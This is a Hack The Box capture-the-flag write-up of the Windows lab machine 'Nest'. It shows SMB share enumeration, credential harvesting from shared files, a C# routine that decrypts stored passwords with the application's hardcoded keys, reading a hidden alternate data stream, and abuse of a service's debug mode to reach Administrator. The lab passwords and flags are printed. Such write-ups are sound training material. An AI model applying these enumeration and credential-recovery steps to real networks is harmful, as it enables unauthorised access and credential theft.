Writeups

Hack The Box Writeup: Nest

Nest is a Window box that saw the light of day on Hack The Box on January 25 . A nice box where you are constantly exploring and taking a step further every time. There is a lot of discussion about the complexity of this box because according to the maker it qualifies as “Easy” but many find it between “Medium” and “Hard.”.

Hack The Box Nest Infocard

[0x1] Reconnaissance & Enumeration

The first step in exploring Nest is an Nmap scan. I opt for an extensive scan of all ports (including non-standard ports) including standard scripts and service / version detection.

nmap -sC -sV -p- -oA nest 10.10.10.178

A scan of the entire port range always takes a while. Over time, the results will come up and the scan will indicate that port 445 / tcp and 4386 / tcp are open. Port 445 / tcp is SMB and 4386 is unknown to me. According to the scan, a database reporting service is running on this.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-26 19:51 GMT
Stats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 11.33% done; ETC: 19:56 (0:03:55 remaining)
Stats: 0:05:24 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 19:57 (0:00:21 remaining)
Nmap scan report for 10.10.10.178
Host is up (0.021s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds?
4386/tcp open unknown
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
| Reporting Service V1.2
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions:
| Reporting Service V1.2
| Unrecognised command
| Help:
| Reporting Service V1.2
| This service allows users to run queries against databases using the legacy HQK format
| AVAILABLE COMMANDS ---
| LIST
| SETDIR <Directory_Name>
| RUNQUERY <Query_ID>
| DEBUG <Password>
|_ HELP <Command>

Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-01-26T19:59:26
|_ start_date: 2020-01-26T19:44:36

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 507.00 seconds

With the help of SMBclient a number of shares emerge. Besides the standard ADMIN $, C $ and IPC $ we see a few interesting directories.

smbclient -L 10.10.10.178
Enter WORKGROUP\root's password: 

 Sharename Type Comment
 --------- ---- -------
 ADMIN$ Disk Remote Admin
 C$ Disk Default share
 Data Disk 
 IPC$ IPC Remote IPC
 Secure$ Disk 
 Users Disk 
SMB1 disabled -- no workgroup available

[0x2] Initial Foothold

Based on this list, I’m going to take a closer look at Data , Secure $ , and Users to see if any interesting information can be found. An initial foothold is good, but a set of credentials is of course better.

The Users share contains a number of user folders. These are expected to be users whose credentials can be found. For now I still miss the rights to view the folders. Continue to Data.

smbclient  \\\\10.10.10.178\\users
Enter WORKGROUP\root's password: 

Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
  .                                   D        0  Sat Jan 25 23:04:21 2020
  ..                                  D        0  Sat Jan 25 23:04:21 2020
  Administrator                       D        0  Fri Aug  9 16:08:23 2019
  C.Smith                             D        0  Sun Jan 26 07:21:44 2020
  L.Frost                             D        0  Thu Aug  8 18:03:01 2019
  R.Thompson                          D        0  Thu Aug  8 18:02:50 2019
  TempUser                            D        0  Wed Aug  7 23:55:56 2019

\Administrator
NT_STATUS_ACCESS_DENIED listing \Administrator\*

\C.Smith
NT_STATUS_ACCESS_DENIED listing \C.Smith\*

\L.Frost
NT_STATUS_ACCESS_DENIED listing \L.Frost\*

\R.Thompson
NT_STATUS_ACCESS_DENIED listing \R.Thompson\*

\TempUser
NT_STATUS_ACCESS_DENIED listing \TempUser\*
smb: \> 

The Data share contains a number of nested folders and files. Useful here is the recurse command to get a complete listing.

smbclient  \\\\10.10.10.178\\data
Enter WORKGROUP\root's password: 

Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
  .                                   D        0  Wed Aug  7 23:53:46 2019
  ..                                  D        0  Wed Aug  7 23:53:46 2019
  IT                                  D        0  Wed Aug  7 23:58:07 2019
  Production                          D        0  Mon Aug  5 22:53:38 2019
  Reports                             D        0  Mon Aug  5 22:53:44 2019
  Shared                              D        0  Wed Aug  7 20:07:51 2019

\IT
NT_STATUS_ACCESS_DENIED listing \IT\*

\Production
NT_STATUS_ACCESS_DENIED listing \Production\*

\Reports
NT_STATUS_ACCESS_DENIED listing \Reports\*

\Shared
  .                                   D        0  Wed Aug  7 20:07:51 2019
  ..                                  D        0  Wed Aug  7 20:07:51 2019
  Maintenance                         D        0  Wed Aug  7 20:07:32 2019
  Templates                           D        0  Wed Aug  7 20:08:07 2019

\Shared\Maintenance
  .                                   D        0  Wed Aug  7 20:07:32 2019
  ..                                  D        0  Wed Aug  7 20:07:32 2019
  Maintenance Alerts.txt              A       48  Tue Aug  6 00:01:44 2019

\Shared\Templates
  .                                   D        0  Wed Aug  7 20:08:07 2019
  ..                                  D        0  Wed Aug  7 20:08:07 2019
  HR                                  D        0  Wed Aug  7 20:08:01 2019
  Marketing                           D        0  Wed Aug  7 20:08:06 2019

\Shared\Templates\HR
  .                                   D        0  Wed Aug  7 20:08:01 2019
  ..                                  D        0  Wed Aug  7 20:08:01 2019
  Welcome Email.txt                   A      425  Wed Aug  7 23:55:36 2019

\Shared\Templates\Marketing
  .                                   D        0  Wed Aug  7 20:08:06 2019
  ..                                  D        0  Wed Aug  7 20:08:06 2019
smb: \> 

Maintenance Alerts.txt and Welcome Email.txt look interesting for later.

The last share Secure $ is accessible but it is not possible to list files here. Maybe later with a set of credentials.

smbclient  \\\\10.10.10.178\\secure$
Enter WORKGROUP\root's password: 

Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*
smb: \> 

The file Maintenance Alerts.txt only contains a message that there is no Maintenance, this is of no use to me. The second file is Welcome Email.txt and there is something interesting to find here.

\shared\Templates\HR\> dir
  .                                   D        0  Wed Aug  7 20:08:01 2019
  ..                                  D        0  Wed Aug  7 20:08:01 2019
  Welcome Email.txt                   A      425  Wed Aug  7 23:55:36 2019

		10485247 blocks of size 4096. 6448917 blocks available

After the initial foothold I now have a set of credentials from TempUser . This user was previously seen on the Users share .

We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

You will find your home folder in the following location:
\\HTB-NEST\Users\<USERNAME>

If you have any issues accessing specific services or workstations, please inform the
IT department and use the credentials below until all systems have been set up for you.

Username: TempUser
Password: welcome2019

Thank you
HR

[0x3] Path to User flag

Armed with freshly discovered credentials, it’s time to reconnect to the share to see if it can deliver more with TempUser.

The listing lists quite a few files in the IT \ Configs folder which look like application configuration files.

smbclient -U TempUser  \\\\10.10.10.178\\data
Enter WORKGROUP\TempUser's password: 

\IT\Configs\NotepadPlusPlus
  .                                   D        0  Wed Aug  7 20:31:37 2019
  ..                                  D        0  Wed Aug  7 20:31:37 2019
  config.xml                          A     6451  Thu Aug  8 00:01:25 2019
  shortcuts.xml                       A     2108  Wed Aug  7 20:30:27 2019

\IT\Configs\RU Scanner
  .                                   D        0  Wed Aug  7 21:01:13 2019
  ..                                  D        0  Wed Aug  7 21:01:13 2019
  RU_config.xml                       A      270  Thu Aug  8 20:49:37 2019

		10485247 blocks of size 4096. 6448917 blocks available

After going through all the files I found a lot of noise and two interesting files. Enumeration is a thorough task and before you know it you will miss essential information.

In the folder NotepadPlusPlus I find the file Config.xml which contains a reference to three other files. Remarkable is the path to the Secure $ share that I previously visited, but could not see any folders. However, now I do have a path where a folder Carl should be. Is the previously found user folder C. Smith from Carl?

<History nbMaxFile="15" inSubMenu="no" customLength="-1">
        <File filename="C:\windows\System32\drivers\etc\hosts" />
        <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
        <File filename="C:\Users\C.Smith\Desktop\todo.txt" />

The second interesting file is RU_Config in the RU Scanner folder . The contents of this XML file represent a username and password. A quick check indicates that this password is not immediately usable and may be encrypted.

<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>389</Port>
  <Username>c.smith</Username>
  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>

Time to take a look at the path in the NotepadPlusPlus config file.

smbclient -U TempUser  \\\\10.10.10.178\\Secure$
Enter WORKGROUP\TempUser's password: 
Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
  .                                   D        0  Thu Aug  8 00:08:12 2019
  ..                                  D        0  Thu Aug  8 00:08:12 2019
  Finance                             D        0  Wed Aug  7 20:40:13 2019
  HR                                  D        0  Thu Aug  8 00:08:11 2019
  IT                                  D        0  Thu Aug  8 11:59:25 2019

\Finance
NT_STATUS_ACCESS_DENIED listing \Finance\*

\HR
NT_STATUS_ACCESS_DENIED listing \HR\*

\IT
NT_STATUS_ACCESS_DENIED listing \IT\*

The path of the file should be \\ HTB-NEST \ Secure $ \ IT \ Carl \ Temp.txt. This has kept me busy for a while before trying to enter the directory even though it says ACCESS_DENIED. As it turns out, TempUser does have rights to enter the directory, just not to list files in IT. And this does provide some interesting new content.

smb: \IT\> cd Carl
smb: \IT\Carl\> recurse
smb: \IT\Carl\> dir
  .                                   D        0  Wed Aug  7 20:42:14 2019
  ..                                  D        0  Wed Aug  7 20:42:14 2019
  Docs                                D        0  Wed Aug  7 20:44:00 2019
  Reports                             D        0  Tue Aug  6 14:45:40 2019
  VB Projects                         D        0  Tue Aug  6 15:41:55 2019

		10485247 blocks of size 4096. 6448903 blocks available
smb: \IT\Carl\> 


RU Scanner was the folder that previously contained the encrypted password. Here seems to be a Microsoft Visual Studio Project which I download in its entirety to investigate further in Visual Studio. It is expected that the encryption method can be found here, which can provide a method to recover the plain text password.

smb: \IT\Carl\VB Projects\WIP\RU\> dir
  .                                   D        0  Fri Aug  9 16:36:45 2019
  ..                                  D        0  Fri Aug  9 16:36:45 2019
  RUScanner                           D        0  Wed Aug  7 23:05:54 2019
  RUScanner.sln                       A      871  Tue Aug  6 15:45:36 2019

		10485247 blocks of size 4096. 6448903 blocks available

After some tinkering with the project it soon became clear that for me the easiest way to retrieve the password is to call the function below and simply write the output to the console screen.

In Module1.vb I add the line below so that the decrypted password is written.

WriteLine(CInt(Utils.DecryptString(Config.Password)))

The total will then look like this:

Module Module1

    Sub Main()
        Dim Config As ConfigFile = ConfigFile.LoadFromFile("RU_Config.xml")
        Dim test As New SsoIntegration With {.Username = Config.Username, .Password = Utils.DecryptString(Config.Password)}
        WriteLine(CInt(Utils.DecryptString(Config.Password)))
    End Sub
End Module

The decryption function itself can be found in Utils.vbs and uses the encrypted text, a password, salt, password iteration, Init Vector and keysize.

The script runs and returns a string as a decrypted password. Looks plausible like that right?

xRxRxPANCAK3SxRxRx

This password is usable with the username C.Smith and via smbclient I’m going to reconnect to the machine to continue searching.

The output shows some interesting things: user.txt , Debug Mode Password.txt .

smbclient -U "C.Smith"  \\\\10.10.10.178\\Users
Enter WORKGROUP\C.Smith's password: 

Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
  .                                   D        0  Sat Jan 25 23:04:21 2020
  ..                                  D        0  Sat Jan 25 23:04:21 2020
  Administrator                       D        0  Fri Aug  9 16:08:23 2019
  C.Smith                             D        0  Sun Jan 26 07:21:44 2020
  L.Frost                             D        0  Thu Aug  8 18:03:01 2019
  R.Thompson                          D        0  Thu Aug  8 18:02:50 2019
  TempUser                            D        0  Wed Aug  7 23:55:56 2019

\Administrator
NT_STATUS_ACCESS_DENIED listing \Administrator\*

\C.Smith
  .                                   D        0  Sun Jan 26 07:21:44 2020
  ..                                  D        0  Sun Jan 26 07:21:44 2020
  HQK Reporting                       D        0  Fri Aug  9 00:06:17 2019
  user.txt                            A       32  Fri Aug  9 00:05:24 2019

\L.Frost
NT_STATUS_ACCESS_DENIED listing \L.Frost\*

\R.Thompson
NT_STATUS_ACCESS_DENIED listing \R.Thompson\*

\TempUser
NT_STATUS_ACCESS_DENIED listing \TempUser\*

\C.Smith\HQK Reporting
  .                                   D        0  Fri Aug  9 00:06:17 2019
  ..                                  D        0  Fri Aug  9 00:06:17 2019
  AD Integration Module               D        0  Fri Aug  9 13:18:42 2019
  Debug Mode Password.txt             A        0  Fri Aug  9 00:08:17 2019
  HQK_Config_Backup.xml               A      249  Fri Aug  9 00:09:05 2019

\C.Smith\HQK Reporting\AD Integration Module
  .                                   D        0  Fri Aug  9 13:18:42 2019
  ..                                  D        0  Fri Aug  9 13:18:42 2019
  HqkLdap.exe                         A    17408  Thu Aug  8 00:41:16 2019
smb: \> 

The user.txt appears to be indeed provided with the user flag and with this the first part of this machine is in the pocket!

cat user.txt
cf71b25404be5d84fd827e05f426e987

[0x4] Path to Root flag

The Debug Mode Password.txt file is listed as a 0-byte file size. After downloading the file it is indeed empty, which is strange. This is a machine based on Microsoft Windows and a frequently used way of hiding information in a file is to use an Alternate Data Stream (ADS). This puts another file with content in an object property of the dummy file.

With smbclient you can use the command allinfo to display additional information about a file. This must almost be a file with an ADS.

smb: \C.Smith\HQReporting
allinfo "Debug Mode Password.txt
stream: [:Password:$DATA], 15 bytes

Gotcha! So there is an extra file in the dummy file. So the real file I need is called Password . I download this file in the same way as indicated in the text, so dummy file: real file.

get "Debug Mode password.txt:Password"

Now the file is 15 bytes instead of 0 bytes. The file contains another password.

WBQ201953D8w

Because many files give hints towards reporting, it’s time to visit Nest’s second port. Port 4386 already returned several commands and basic information during the scan, so I try to connect to Nest on port 4386 by telnet.

Once connected to the service I give the command help and soon see the next step, there is a DEBUG function that requires a password.

telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.

HQK Reporting Service V1.2

>help

This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>

Activating the debug mode based on the previously found password in the ADS is successful and now it is possible to execute additional commands.

>debug WBQ201953D8w

Debug mode enabled. Use the HELP command to view additional commands that are now available

>help

This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>

The list command returns that I am in the ALL QUERIES folder. There is nothing else to do here.

>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[DIR]  COMPARISONS
[1]   Invoices (Ordered By Customer)
[2]   Products Sold (Ordered By Customer)
[3]   Products Sold In Last 30 Days

After fiddling with the commands I find out that you go back one directory with setdir … List then ensures that the contents of the folder are displayed. The contents of this folder are not usable except for the LDAP folder.

>setdir ..

Current directory set to HQK
>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[DIR]  ALL QUERIES
[DIR]  LDAP
[DIR]  Logs
[1]   HqkSvc.exe
[2]   HqkSvc.InstallState
[3]   HQK_Config.xml

Current Directory: HQK

In the LDAP folder I find an executable that I encountered earlier in Carl’s folder and a config file.

>setdir LDAP

Current directory set to LDAP
>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[1]   HqkLdap.exe
[2]   Ldap.conf

Current Directory: LDAP

By means of showquery <id> I can retrieve the content of the file Ldap.conf and I find the username: Administrator and his password. This looks encrypted just like before and a quick check confirms this. In this form, the password cannot be used to log in directly.

>showquery 2

Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

I have previously saved the Windows executable in Carl’s folder and this is probably the file that creates or reads Ldap.conf and therefore also the encryption.

\C.Smith\HQK Reporting\AD Integration Module
  .                                   D        0  Fri Aug  9 13:18:42 2019
  ..                                  D        0  Fri Aug  9 13:18:42 2019
  HqkLdap.exe                         A    17408  Thu Aug  8 00:41:16 2019

Considering that it is an executable, it took some time to Googling for a free tool that can provide insight into the compiled file. I used dotPeek from JetBrains for this. After opening I soon came across similarities to the earlier Visual Basic Project and soon found the decryption function.

I couldn’t modify the file itself to do the same trick as with the Visual Studio Project. I copied the relevant code to an online .Net compiler to have the function and add something to it for processing the encrypted password and showing the outcome.

using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

namespace HqkLdap
{
  public class CR
  {
    private const string K = "667912";
    private const string I = "1L1SA61493DRV53Z";
    private const string SA = "1313Rf99";

    public static string DS(string EncryptedString)
    {
      return string.IsNullOrEmpty(EncryptedString) ? string.Empty : CR.RD(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256);
    }
    private static string RD(
      string cipherText,
      string passPhrase,
      string saltValue,
      int passwordIterations,
      string initVector,
      int keySize)
    {
      byte[] bytes1 = Encoding.ASCII.GetBytes(initVector);
      byte[] bytes2 = Encoding.ASCII.GetBytes(saltValue);
      byte[] buffer = Convert.FromBase64String(cipherText);
      byte[] bytes3 = new Rfc2898DeriveBytes(passPhrase, bytes2, passwordIterations).GetBytes(checked ((int) Math.Round(unchecked ((double) keySize / 8.0))));
      AesCryptoServiceProvider cryptoServiceProvider = new AesCryptoServiceProvider();
      cryptoServiceProvider.Mode = CipherMode.CBC;
      ICryptoTransform decryptor = cryptoServiceProvider.CreateDecryptor(bytes3, bytes1);
      MemoryStream memoryStream = new MemoryStream(buffer);
      CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, decryptor, CryptoStreamMode.Read);
      byte[] numArray = new byte[checked (buffer.Length + 1)];
      int count = cryptoStream.Read(numArray, 0, numArray.Length);
      memoryStream.Close();
      cryptoStream.Close();
      return Encoding.ASCII.GetString(numArray, 0, count);
    }

   public static void Main()
 {

  Console.WriteLine(CR.DS("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4="));
 }
}
}

The last line, shown separately below, is all it takes to decrypt the string and show the original password.

Console.WriteLine(CR.DS("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4="));

Thanks for playing, a password with a friendly note from the originator. This is expected to be the Administrator password, given the information in the Ldap.conf .

XtH4nkS4Pl4y1nGX

With the newly acquired password I connect to the Users share using smbclient and go to the Administrator folder . There is a file, but you can already deduce from the name that this is not the final flag for root.

smbclient -U "Administrator"  \\\\10.10.10.178\\Users
Enter WORKGROUP\Administrator's password: 

Try "help" to get a list of possible commands.

smb: \> cd Administrator
smb: \Administrator\> dir
  .                                   D        0  Fri Aug  9 16:08:23 2019
  ..                                  D        0  Fri Aug  9 16:08:23 2019
  flag.txt - Shortcut.lnk             A     2384  Fri Aug  9 16:10:15 2019

The shortcut points to the Administrator’s Desktop folder which is believed to contain the root.txt .

\\Htb-nest\c$\Users\Administrator\Desktop\flag.txt

A new connection to the share C $ and through to the Administrator Desktop for the root flag. Yep, with 32 bytes, root.txt contains the root flag!

smbclient -U "Administrator"  \\\\10.10.10.178\\C$
Enter WORKGROUP\Administrator's password: 
Try "help" to get a list of possible commands.

smb: \> cd Users\Administrator\Desktop\
smb: \Users\Administrator\Desktop\> dir
  .                                  DR        0  Sun Jan 26 07:20:50 2020
  ..                                 DR        0  Sun Jan 26 07:20:50 2020
  desktop.ini                       AHS      282  Sat Jan 25 22:02:44 2020
  root.txt                            A       32  Mon Aug  5 23:27:26 2019

		10485247 blocks of size 4096. 6449467 blocks available


All information in this post is for educational use only! Do not use it at others when you do not have explicit approval to do so. I am not responsible for your actions. Using this knowledge for illegal activities could land you in jail!


Tags

d0p4m1n3

Ethical Hacker | Cybersecurity enthusiast | Always looking to expand my knowledge | got root?

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button
%d bloggers like this: